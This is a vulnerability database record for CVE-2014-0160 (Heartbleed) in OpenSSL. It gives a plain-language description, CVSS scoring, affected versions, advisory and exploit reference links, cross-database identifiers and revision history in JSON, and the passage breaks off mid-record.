ID CVE-2014-0160 Type cve Reporter cve@mitre.org Modified 2019-10-09T23:09:00
Description
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization’s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.
{"id": "CVE-2014-0160", "bulletinFamily": "NVD", "title": "CVE-2014-0160", "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "published": "2014-04-07T22:55:00", "modified": "2019-10-09T23:09:00", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "reporter": "cve@mitre.org", "references": ["http://marc.info/?l=bugtraq&m=139757726426985&w=2", "http://www.exploit-db.com/exploits/32745", "http://www.securitytracker.com/id/1030079", "http://marc.info/?l=bugtraq&m=139758572430452&w=2", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.html", "http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html", "http://marc.info/?l=bugtraq&m=140015787404650&w=2", "http://marc.info/?l=bugtraq&m=139824993005633&w=2", "http://www.kerio.com/support/kerio-control/release-history", "http://www.securitytracker.com/id/1030082", "http://marc.info/?l=bugtraq&m=139817685517037&w=2", "http://www.kb.cert.org/vuls/id/720951", "http://marc.info/?l=bugtraq&m=139765756720506&w=2", "http://www-01.ibm.com/support/docview.wss?uid=isg400001843", "http://cogentdatahub.com/ReleaseNotes.html", "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E", "http://seclists.org/fulldisclosure/2014/Apr/190", "http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/", "http://marc.info/?l=bugtraq&m=139835815211508&w=2", "http://seclists.org/fulldisclosure/2014/Apr/109", "http://www.exploit-db.com/exploits/32764", "http://marc.info/?l=bugtraq&m=139905243827825&w=2", "http://www.ubuntu.com/usn/USN-2165-1", "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html", "http://support.citrix.com/article/CTX140605", "http://www.securityfocus.com/archive/1/534161/100/0/threaded", "http://marc.info/?l=bugtraq&m=139817727317190&w=2", "http://marc.info/?l=bugtraq&m=139889113431619&w=2", "http://seclists.org/fulldisclosure/2014/Dec/23", "http://secunia.com/advisories/57966", "http://marc.info/?l=bugtraq&m=139905405728262&w=2", "https://filezilla-project.org/versions.php?type=server", "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "http://marc.info/?l=bugtraq&m=139774703817488&w=2", "http://marc.info/?l=bugtraq&m=139889295732144&w=2", "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "http://rhn.redhat.com/errata/RHSA-2014-0378.html", "http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/", "http://marc.info/?l=bugtraq&m=139842151128341&w=2", "http://marc.info/?l=bugtraq&m=139774054614965&w=2", "http://marc.info/?l=bugtraq&m=139905295427946&w=2", "https://gist.github.com/chapmajs/10473815", "http://secunia.com/advisories/57836", "http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1", "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html", "http://marc.info/?l=bugtraq&m=142660345230545&w=2", "http://www.blackberry.com/btsc/KB35882", "http://marc.info/?l=bugtraq&m=139833395230364&w=2", "http://seclists.org/fulldisclosure/2014/Apr/173", "http://marc.info/?l=bugtraq&m=139836085512508&w=2", "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed", "http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0", "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.html", "http://secunia.com/advisories/59347", "https://blog.torproject.org/blog/openssl-bug-cve-2014-0160", "https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken", "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008", "http://marc.info/?l=bugtraq&m=139905458328378&w=2", "http://marc.info/?l=bugtraq&m=139905202427693&w=2", "http://marc.info/?l=bugtraq&m=140752315422991&w=2", "https://code.google.com/p/mod-spdy/issues/detail?id=85", "http://www.vmware.com/security/advisories/VMSA-2014-0012.html", "http://marc.info/?l=bugtraq&m=139869891830365&w=2", "http://www.debian.org/security/2014/dsa-2896", "http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661", "http://www.securitytracker.com/id/1030026", "http://rhn.redhat.com/errata/RHSA-2014-0396.html", "http://secunia.com/advisories/57483", "http://www.securityfocus.com/bid/66690", "http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/", "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217", "http://marc.info/?l=bugtraq&m=139824923705461&w=2", "http://secunia.com/advisories/57968", "http://www.securitytracker.com/id/1030078", "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", "http://secunia.com/advisories/57347", "http://heartbleed.com/", "http://marc.info/?l=bugtraq&m=139722163017074&w=2", "http://marc.info/?l=bugtraq&m=140724451518351&w=2", "http://secunia.com/advisories/57721", "https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d@%3Cdev.tomcat.apache.org%3E", "http://www-01.ibm.com/support/docview.wss?uid=swg21670161", "http://marc.info/?l=bugtraq&m=141287864628122&w=2", "http://www.openssl.org/news/secadv_20140407.txt", "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.html", "http://www.securitytracker.com/id/1030081", "http://marc.info/?l=bugtraq&m=139817782017443&w=2", "http://seclists.org/fulldisclosure/2014/Apr/91", "http://marc.info/?l=bugtraq&m=139843768401936&w=2", "http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html", "http://www.securitytracker.com/id/1030077", "http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html", "http://seclists.org/fulldisclosure/2014/Apr/90", "http://secunia.com/advisories/59139", "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202014-119-01", "http://www.us-cert.gov/ncas/alerts/TA14-098A", "http://advisories.mageia.org/MGASA-2014-0165.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1084875", "http://www.f-secure.com/en/web/labs_global/fsc-2014-1", "http://www.securitytracker.com/id/1030074", "http://secunia.com/advisories/59243", "http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=96db9023b881d7cd9f379b0c154650d6c108e9a3", "http://www.securitytracker.com/id/1030080", "http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/", "http://rhn.redhat.com/errata/RHSA-2014-0376.html", "http://marc.info/?l=bugtraq&m=139905351928096&w=2", "http://rhn.redhat.com/errata/RHSA-2014-0377.html", "http://marc.info/?l=bugtraq&m=139757819327350&w=2", "http://marc.info/?l=bugtraq&m=139835844111589&w=2", "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00", "http://marc.info/?l=bugtraq&m=139757919027752&w=2", "http://www-01.ibm.com/support/docview.wss?uid=isg400001841", "http://marc.info/?l=bugtraq&m=139869720529462&w=2", "http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/", "http://marc.info/?l=bugtraq&m=140075368411126&w=2", "http://marc.info/?l=bugtraq&m=139905868529690&w=2", "http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf", "http://marc.info/?l=bugtraq&m=139905653828999&w=2", "http://www.splunk.com/view/SP-CAAAMB3", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062", "http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3", "https://www.cert.fi/en/reports/2014/vulnerability788210.html", "http://marc.info/?l=bugtraq&m=139808058921905&w=2"], "cvelist": ["CVE-2014-0160"], "type": "cve", "lastseen": "2019-10-10T12:13:41", "history": [{"bulletin": {"affectedSoftware": [{"name": "openssl openssl", "operator": "eq", "version": "1.0.1e"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1b"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1c"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1d"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1a"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.2"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1f"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:1.0.1d", "cpe:/a:openssl:openssl:1.0.2", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.1f"], "cpe23": ["cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-0160"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-119"], "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:13:42", "references": [{"idList": ["PACKETSTORM:126070", "PACKETSTORM:126308", "PACKETSTORM:126101", "PACKETSTORM:126069"], "type": "packetstorm"}, {"idList": ["THREATPOST:15624C23F5CD5AC1029501D08A99D294", "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "THREATPOST:9012A325F248438FAC15C4FB3082A796"], "type": "threatpost"}, {"idList": ["H1:6475", "H1:32570", "H1:49139", "H1:44294", "H1:6626"], "type": "hackerone"}, {"idList": ["F5:K15159", "SOL15159"], "type": "f5"}, {"idList": ["NMAP:SSL-HEARTBLEED.NSE"], "type": "nmap"}, {"idList": ["CFOUNDRY:51A1D2F1D196381CC46CAE44EB5F5940"], "type": "cloudfoundry"}, {"idList": ["CESA-2014:0376"], "type": "centos"}, {"idList": ["OPENSUSE-SU-2014:0492-1"], "type": "suse"}, {"idList": ["KITPLOIT:8800200070735873517", "KITPLOIT:7942195329946074809"], "type": "kitploit"}, {"idList": ["DEBIAN:DSA-2896-1:7AEC1", "DEBIAN:DSA-2896-2:FEB91"], "type": "debian"}, {"idList": ["HUAWEI-SA-20140417-HEARTBLEED"], "type": "huawei"}, {"idList": ["MSF:AUXILIARY/SCANNER/SSL/OPENSSL_HEARTBLEED", "MSF:AUXILIARY/SERVER/OPENSSL_HEARTBEAT_CLIENT_MEMORY"], "type": "metasploit"}, {"idList": ["SSV:86061", "SSV:62241", "SSV:62239", "SSV:95013", "SSV:62086", "SSV:62240", "SSV:62199", "SSV:62181", "SSV:62189"], "type": "seebug"}, {"idList": ["MCAFEE_EPO_SB10071.NASL", "MCAFEE_EMAIL_GATEWAY_SB10071.NASL", "FORTINET_FG-IR-14-011.NASL", "OPENSSL_HEARTBLEED.NASL", "MCAFEE_FIREWALL_ENTERPRISE_SB10071.NASL", "ATTACHMATE_REFLECTION_SECURE_IT_FOR_WIN_CLIENT_HEARTBLEED.NASL", "REDHAT-RHSA-2014-0376.NASL", "SYMANTEC_ENDPOINT_PROT_MGR_12_1_RU4_MP1A.NASL", "F5_BIGIP_SOL15159.NASL", "ATTACHMATE_REFLECTION_HEARTBLEED.NASL"], "type": "nessus"}, {"idList": ["ICSA-14-126-01A", "ICSA-14-114-01", "ICSA-14-135-05"], "type": "ics"}, {"idList": ["OPENVAS:871154", "OPENVAS:1361412562310702896", "OPENVAS:1361412562310103936"], "type": "openvas"}, {"idList": ["SECURITYVULNS:DOC:30525", "SECURITYVULNS:DOC:30472", "SECURITYVULNS:DOC:30504", "SECURITYVULNS:DOC:30519", "SECURITYVULNS:DOC:30506", "SECURITYVULNS:DOC:30473", "SECURITYVULNS:DOC:30471", "SECURITYVULNS:DOC:30478", "SECURITYVULNS:DOC:30474", "SECURITYVULNS:DOC:30524"], "type": "securityvulns"}, {"idList": ["RHSA-2014:0378", "RHSA-2014:0376"], "type": "redhat"}, {"idList": ["ATLASSIAN:JRACLOUD-38927", "ATLASSIAN:JRASERVER-38927"], "type": "atlassian"}, {"idList": ["VULNERLAB:1254"], "type": "vulnerlab"}, {"idList": ["MYHACK58:62201444409"], "type": "myhack58"}, {"idList": ["THN:0F7112302CBABF46D19CACCCFA6103C5", "THN:244769C413FFA5BE647D8F6F93431B74"], "type": "thn"}, {"idList": ["VU:720951"], "type": "cert"}, {"idList": ["ELSA-2014-0376"], "type": "oraclelinux"}, {"idList": ["N0WHERE:76566"], "type": "n0where"}, {"idList": ["OPENSSL:CVE-2014-0160"], "type": "openssl"}]}, "score": {"modified": "2019-05-29T18:13:42", "value": 3.8, "vector": "NONE"}}, "hash": "1f13baaf56a8a5dd93795431240fb103326664e4390aba377191c3748c38d2ed", "hashmap": [{"hash": "4a7f9b96159b185177ba0e028013ad0d", "key": "description"}, {"hash": "4e6de9f15972c64d07114049f2990cee", "key": "published"}, {"hash": "f30109dfdbfbf783c0b61792a6b2c20a", "key": "cvss2"}, {"hash": "9b42f371c40412564128c51351ac8ad4", "key": "modified"}, {"hash": "bb61a0949f8c36262500079f243672e2", "key": "cwe"}, {"hash": "9ef1a304ad3a7d2a64542a650c6ed7f9", "key": "cpe23"}, {"hash": "a89198c45ce87f7ec9735a085150b708", "key": "cvss"}, {"hash": "e47701c26849d76ae028a2f8417316ff", "key": "references"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "558f8e06acb9904c2df3eef5d5dc7dd3", "key": "cvelist"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "f85b26d5e70f0213ff61e66d4a867d1a", "key": "href"}, {"hash": "061f4a9aa366d9efc70d4fe225664979", "key": "cpe"}, {"hash": "be362338053a91d71f19a12380585eaf", "key": "affectedSoftware"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "9284251a43e341803d4971bd8752145e", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160", "id": "CVE-2014-0160", "lastseen": "2019-05-29T18:13:42", "modified": "2019-03-25T11:34:00", "objectVersion": "1.3", "published": "2014-04-07T22:55:00", "references": ["http://marc.info/?l=bugtraq&m=139757726426985&w=2", "http://www.exploit-db.com/exploits/32745", "http://www.securitytracker.com/id/1030079", "http://marc.info/?l=bugtraq&m=139758572430452&w=2", "http://lists.opensuse.org/opensuse-updates/2014-04/msg00061.html", "http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131291.html", "http://marc.info/?l=bugtraq&m=140015787404650&w=2", "http://marc.info/?l=bugtraq&m=139824993005633&w=2", "http://www.kerio.com/support/kerio-control/release-history", "http://www.securitytracker.com/id/1030082", "http://marc.info/?l=bugtraq&m=139817685517037&w=2", "http://www.kb.cert.org/vuls/id/720951", "http://marc.info/?l=bugtraq&m=139765756720506&w=2", "http://www-01.ibm.com/support/docview.wss?uid=isg400001843", "http://cogentdatahub.com/ReleaseNotes.html", "https://lists.apache.org/thread.html/f8e0814e11c7f21f42224b6de111cb3f5e5ab5c15b78924c516d4ec2@%3Cdev.tomcat.apache.org%3E", "http://seclists.org/fulldisclosure/2014/Apr/190", "http://www.getchef.com/blog/2014/04/09/chef-server-11-0-12-release/", "http://marc.info/?l=bugtraq&m=139835815211508&w=2", "http://seclists.org/fulldisclosure/2014/Apr/109", "http://www.exploit-db.com/exploits/32764", "http://marc.info/?l=bugtraq&m=139905243827825&w=2", "http://www.ubuntu.com/usn/USN-2165-1", "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html", "http://support.citrix.com/article/CTX140605", "http://www.securityfocus.com/archive/1/534161/100/0/threaded", "http://marc.info/?l=bugtraq&m=139817727317190&w=2", "http://marc.info/?l=bugtraq&m=139889113431619&w=2", "http://seclists.org/fulldisclosure/2014/Dec/23", "http://secunia.com/advisories/57966", "http://marc.info/?l=bugtraq&m=139905405728262&w=2", "https://filezilla-project.org/versions.php?type=server", "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html", "http://marc.info/?l=bugtraq&m=139774703817488&w=2", "http://marc.info/?l=bugtraq&m=139889295732144&w=2", "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00004.html", "http://rhn.redhat.com/errata/RHSA-2014-0378.html", "http://www.getchef.com/blog/2014/04/09/chef-server-heartbleed-cve-2014-0160-releases/", "http://marc.info/?l=bugtraq&m=139842151128341&w=2", "http://marc.info/?l=bugtraq&m=139774054614965&w=2", "http://marc.info/?l=bugtraq&m=139905295427946&w=2", "https://gist.github.com/chapmajs/10473815", "http://secunia.com/advisories/57836", "http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=1", "http://lists.opensuse.org/opensuse-security-announce/2014-04/msg00005.html", "http://marc.info/?l=bugtraq&m=142660345230545&w=2", "http://www.blackberry.com/btsc/KB35882", "http://marc.info/?l=bugtraq&m=139833395230364&w=2", "http://seclists.org/fulldisclosure/2014/Apr/173", "http://marc.info/?l=bugtraq&m=139836085512508&w=2", "http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140409-heartbleed", "http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0", "http://lists.fedoraproject.org/pipermail/package-announce/2014-August/136473.html", "http://secunia.com/advisories/59347", "https://blog.torproject.org/blog/openssl-bug-cve-2014-0160", "https://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDisplay/?spf_p.tpst=kbDocDisplay&spf_p.prp_kbDocDisplay=wsrp-navigationalState%3DdocId%253Demr_na-c04260637-4%257CdocLocale%253Den_US%257CcalledBy%253DSearch_Result&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken", "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008", "http://marc.info/?l=bugtraq&m=139905458328378&w=2", "http://marc.info/?l=bugtraq&m=139905202427693&w=2", "http://marc.info/?l=bugtraq&m=140752315422991&w=2", "https://code.google.com/p/mod-spdy/issues/detail?id=85", "http://www.vmware.com/security/advisories/VMSA-2014-0012.html", "http://marc.info/?l=bugtraq&m=139869891830365&w=2", "http://www.debian.org/security/2014/dsa-2896", "http://www-01.ibm.com/support/docview.wss?uid=ssg1S1004661", "http://www.securitytracker.com/id/1030026", "http://rhn.redhat.com/errata/RHSA-2014-0396.html", "http://secunia.com/advisories/57483", "http://www.securityfocus.com/bid/66690", "http://www.getchef.com/blog/2014/04/09/enterprise-chef-11-1-3-release/", "https://support.f5.com/kb/en-us/solutions/public/15000/100/sol15159.html?sr=36517217", "http://marc.info/?l=bugtraq&m=139824923705461&w=2", "http://secunia.com/advisories/57968", "http://www.securitytracker.com/id/1030078", "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", "http://secunia.com/advisories/57347", "http://heartbleed.com/", "http://marc.info/?l=bugtraq&m=139722163017074&w=2", "http://marc.info/?l=bugtraq&m=140724451518351&w=2", "http://secunia.com/advisories/57721", "https://lists.apache.org/thread.html/ba661b0edd913b39ff129a32d855620dd861883ade05fd88a8ce517d@%3Cdev.tomcat.apache.org%3E", "http://www-01.ibm.com/support/docview.wss?uid=swg21670161", "http://marc.info/?l=bugtraq&m=141287864628122&w=2", "http://www.openssl.org/news/secadv_20140407.txt", "https://lists.balabit.hu/pipermail/syslog-ng-announce/2014-April/000184.html", "http://www.securitytracker.com/id/1030081", "http://marc.info/?l=bugtraq&m=139817782017443&w=2", "http://seclists.org/fulldisclosure/2014/Apr/91", "http://marc.info/?l=bugtraq&m=139843768401936&w=2", "http://www.oracle.com/technetwork/topics/security/opensslheartbleedcve-2014-0160-2188454.html", "http://www.securitytracker.com/id/1030077", "http://lists.fedoraproject.org/pipermail/package-announce/2014-April/131221.html", "http://seclists.org/fulldisclosure/2014/Apr/90", "http://secunia.com/advisories/59139", "http://download.schneider-electric.com/files?p_Doc_Ref=SEVD%202014-119-01", "http://www.us-cert.gov/ncas/alerts/TA14-098A", "http://advisories.mageia.org/MGASA-2014-0165.html", "https://bugzilla.redhat.com/show_bug.cgi?id=1084875", "http://www.f-secure.com/en/web/labs_global/fsc-2014-1", "http://www.securitytracker.com/id/1030074", "http://secunia.com/advisories/59243", "http://git.openssl.org/gitweb/?p=openssl.git;a=commit;h=96db9023b881d7cd9f379b0c154650d6c108e9a3", "http://www.securitytracker.com/id/1030080", "http://blog.fox-it.com/2014/04/08/openssl-heartbleed-bug-live-blog/", "http://rhn.redhat.com/errata/RHSA-2014-0376.html", "http://marc.info/?l=bugtraq&m=139905351928096&w=2", "http://rhn.redhat.com/errata/RHSA-2014-0377.html", "http://marc.info/?l=bugtraq&m=139757819327350&w=2", "http://marc.info/?l=bugtraq&m=139835844111589&w=2", "http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160512_00", "http://marc.info/?l=bugtraq&m=139757919027752&w=2", "http://www-01.ibm.com/support/docview.wss?uid=isg400001841", "http://marc.info/?l=bugtraq&m=139869720529462&w=2", "http://www.getchef.com/blog/2014/04/09/enterprise-chef-1-4-9-release/", "http://marc.info/?l=bugtraq&m=140075368411126&w=2", "http://marc.info/?l=bugtraq&m=139905868529690&w=2", "http://www.innominate.com/data/downloads/manuals/mdm_1.5.2.1_Release_Notes.pdf", "http://marc.info/?l=bugtraq&m=139905653828999&w=2", "http://www.splunk.com/view/SP-CAAAMB3", "http://www.mandriva.com/security/advisories?name=MDVSA-2015:062", "http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=3", "https://www.cert.fi/en/reports/2014/vulnerability788210.html", "http://marc.info/?l=bugtraq&m=139808058921905&w=2"], "reporter": "cve@mitre.org", "title": "CVE-2014-0160", "type": "cve", "viewCount": 364}, "differentElements": ["modified"], "edition": 1, "lastseen": "2019-05-29T18:13:42"}, {"bulletin": {"affectedSoftware": [{"name": "openssl openssl", "operator": "eq", "version": "1.0.1e"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1b"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1c"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1d"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1a"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.2"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1f"}, {"name": "openssl openssl", "operator": "eq", "version": "1.0.1"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:openssl:openssl:1.0.1a", "cpe:/a:openssl:openssl:1.0.1", "cpe:/a:openssl:openssl:1.0.1e", "cpe:/a:openssl:openssl:1.0.1d", "cpe:/a:openssl:openssl:1.0.2", "cpe:/a:openssl:openssl:1.0.1b", "cpe:/a:openssl:openssl:1.0.1c", "cpe:/a:openssl:openssl:1.0.1f"], "cpe23": ["cpe:2.3:a:openssl:openssl:1.0.1:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta3:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.2:beta1:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1:beta2:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*"], "cvelist": ["CVE-2014-0160"], "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "cwe": ["CWE-119"], "description": "The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.\nCVSS V2 scoring evaluates the impact of the vulnerability on the host where the vulnerability is located. When evaluating the impact of this vulnerability to your organization, take into account the nature of the data that is being protected and act according to your organization\u2019s risk acceptance. While CVE-2014-0160 does not allow unrestricted access to memory on the targeted host, a successful exploit does leak information from memory locations which have the potential to contain particularly sensitive information, e.g., cryptographic keys and passwords. Theft of this information could enable other attacks on the information system, the impact of which would depend on the sensitivity of the data and functions of that system.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-09-28T12:09:00", "references": [{"idList": ["H1:6475", "H1:32570", "H1:49139"], "type": "hackerone"}, {"idList": ["PACKETSTORM:126070", "PACKETSTORM:126308", "PACKETSTORM:126101", "PACKETSTORM:126069"], "type": "packetstorm"}, {"idList": ["THREATPOST:15624C23F5CD5AC1029501D08A99D294", "THREATPOST:2C5C82CF691D70F64A14DA1BEC242DD5", "THREATPOST:9012A325F248438FAC15C4FB3082A796"], "type": "threatpost"}, {"idList": ["F5:K15159", "SOL15159"], "type": "f5"}, {"idList": ["SSV:62182", "SSV:62241", "SSV:62239", "SSV:62186", "SSV:62199", "SSV:62190", "SSV:62197", "SSV:62189", "SSV:62185"], "type": "seebug"}, {"idList": 